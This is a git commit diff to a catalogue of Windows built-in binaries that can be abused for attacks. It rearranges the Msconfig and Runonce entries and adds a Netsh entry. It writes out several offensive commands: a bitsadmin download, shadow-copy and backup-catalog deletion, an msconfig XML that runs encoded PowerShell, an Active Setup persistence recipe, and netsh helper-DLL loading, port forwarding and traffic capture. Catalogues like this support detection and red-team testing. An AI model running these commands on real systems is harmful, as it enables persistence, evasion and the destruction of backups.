Adjustments
parent
a9094f0d47
commit
d14a899655
|
@ -6,7 +6,6 @@ Robocopy.exe Needs examples
|
||||||
Bitsadmin.exe bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
|
Bitsadmin.exe bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
|
||||||
Vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
|
Vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
|
||||||
notepad.exe Gui - Download files using Open (A lot of other programs as well)
|
notepad.exe Gui - Download files using Open (A lot of other programs as well)
|
||||||
netsh.exe Netsh helper dll file loading
|
|
||||||
wbadmin.exe wbadmin delete catalog -quiet
|
wbadmin.exe wbadmin delete catalog -quiet
|
||||||
psexec.exe Remote execution of code
|
psexec.exe Remote execution of code
|
||||||
java.exe -agentpath:<dllname_with_dll_extension> or -agentlib:<dllname>
|
java.exe -agentpath:<dllname_with_dll_extension> or -agentlib:<dllname>
|
||||||
|
|
|
@ -1,16 +1,5 @@
|
||||||
## Msconfig.exe
|
## Msconfig.exe
|
||||||
|
|
||||||
* Prerequisites
|
|
||||||
|
|
||||||
add a crafted .xml in System32
|
|
||||||
```
|
|
||||||
<?xml version="1.0" ?>
|
|
||||||
<MSCONFIGTOOLS>
|
|
||||||
<a NAME="LOLBin" PATH="%windir%\System32\WindowsPowerShell\v1.0\powershell.exe"
|
|
||||||
DEFAULT_OPT="-nop -sta -enc -w 1 YOURBASE64" ADV_OPT="-command calc.exe" HELP="LOLBin MSCONFIGTOOLS"/>
|
|
||||||
</MSCONFIGTOOLS>
|
|
||||||
```
|
|
||||||
|
|
||||||
* Functions: Execute
|
* Functions: Execute
|
||||||
|
|
||||||
```
|
```
|
||||||
|
@ -31,7 +20,14 @@ c:\windows\system32\msconfig.exe
|
||||||
```
|
```
|
||||||
|
|
||||||
Notes:
|
Notes:
|
||||||
|
* Prerequisites
|
||||||
|
add a crafted .xml in System32
|
||||||
|
|
||||||
|
```
|
||||||
|
<?xml version="1.0" ?>
|
||||||
|
<MSCONFIGTOOLS>
|
||||||
|
<a NAME="LOLBin" PATH="%windir%\System32\WindowsPowerShell\v1.0\powershell.exe"
|
||||||
|
DEFAULT_OPT="-nop -sta -enc -w 1 YOURBASE64" ADV_OPT="-command calc.exe" HELP="LOLBin MSCONFIGTOOLS"/>
|
||||||
|
</MSCONFIGTOOLS>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,38 @@
|
||||||
|
## Netsh.exe
|
||||||
|
|
||||||
|
* Functions: Execute, Surveillance
|
||||||
|
|
||||||
|
```
|
||||||
|
netsh trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl
|
||||||
|
netsh trace show status
|
||||||
|
|
||||||
|
netsh.exe add helper C:\Path\file.dll
|
||||||
|
|
||||||
|
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
|
||||||
|
```
|
||||||
|
|
||||||
|
Acknowledgements:
|
||||||
|
*
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
*
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
|
||||||
|
* https://attack.mitre.org/wiki/Technique/T1128
|
||||||
|
* https://twitter.com/teemuluotio/status/990532938952527873
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
c:\windows\system32\netsh.exe
|
||||||
|
c:\windows\sysWOW64\netsh.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Detection:
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -1,16 +1,9 @@
|
||||||
## Runonce.exe
|
## Runonce.exe
|
||||||
|
|
||||||
* Prerequisites
|
|
||||||
|
|
||||||
1) Create HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\[YOURKEY]
|
|
||||||
2) Create two Strings :
|
|
||||||
a) @ : Hi from Active Setup
|
|
||||||
b) StubPath : calc.exe
|
|
||||||
|
|
||||||
* Functions: Execute
|
* Functions: Execute
|
||||||
|
|
||||||
```
|
```
|
||||||
Runonce.exe /AlternateShellStartup
|
Runonce.exe /AlternateShellStartup
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
|
@ -24,10 +17,16 @@ Resources:
|
||||||
Full path:
|
Full path:
|
||||||
```
|
```
|
||||||
c:\windows\system32\runonce.exe
|
c:\windows\system32\runonce.exe
|
||||||
|
c:\windows\sysWOW64\runonce.exe
|
||||||
```
|
```
|
||||||
|
|
||||||
Notes:
|
Notes:
|
||||||
|
* Prerequisites
|
||||||
|
|
||||||
|
1) Create HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\[YOURKEY]
|
||||||
|
2) Create two Strings :
|
||||||
|
a) @ : Hi from Active Setup
|
||||||
|
b) StubPath : calc.exe
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue